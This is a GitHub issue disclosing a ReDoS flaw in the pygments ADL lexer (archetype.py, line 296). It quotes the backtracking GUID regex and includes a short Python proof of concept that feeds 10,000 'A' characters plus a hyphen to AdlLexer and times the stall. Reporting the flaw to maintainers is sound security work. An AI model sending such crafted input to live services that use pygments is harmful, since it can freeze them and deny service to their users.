-
Notifications
You must be signed in to change notification settings - Fork 791
ReDoS Vulnerability in pygments archetype.py due to Inefficient Regex for GUID Matching (CWE-1333) #3058
Copy link
Copy link
Closed
Description
Description
A Regular Expression Denial of Service (ReDoS) vulnerability exists in the pygments project at pygments/lexers/archetype.py (line 296). The regex pattern (\d|[a-fA-F])+(-(\d|[a-fA-F])+){3,} designed for GUID matching contains nested repeating quantifiers, leading to catastrophic backtracking when processing partially matching malicious input. This results in severe performance degradation and can block the application thread indefinitely with sufficiently large input, complying with CWE-1333 (Inefficient Regular Expression Complexity).
Affected code:
pygments/pygments/lexers/archetype.py
Line 296 in c288c0e
| (r'(\d|[a-fA-F])+(-(\d|[a-fA-F])+){3,}', Literal), |
Currently the latest man branch is affected. And pygments <=2.19.2
POC Description
- Construct a malicious input string consisting of 10000 consecutive 'A' characters followed by a hyphen ("A"*10000 + "-").
- Pass the input to the AdlLexer from pygments.lexers and invoke the lex function for syntax highlighting (which triggers the vulnerable regex matching).
- The regex engine attempts exhaustive backtracking to resolve the partial match, leading to a significant delay (tested to take ~8 seconds for the 10001-character input).
- The delay confirms the ReDoS vulnerability is successfully triggered, as the matching process takes far longer than normal valid input processing.
POC Code (Minimal, Runable)
import time
from pygments.lexers import AdlLexer
from pygments import lex
malicious_input = "A" * 10000 + "-"
lexer = AdlLexer()
start = time.time()
list(lex(malicious_input, lexer))
elapsed = time.time() - start
print(f"Elapsed time: {elapsed:.2f}s")
# Vulnerability confirmed since elapsed time > 1sReactions are currently unavailable
Metadata
Metadata
Assignees
Labels
No labels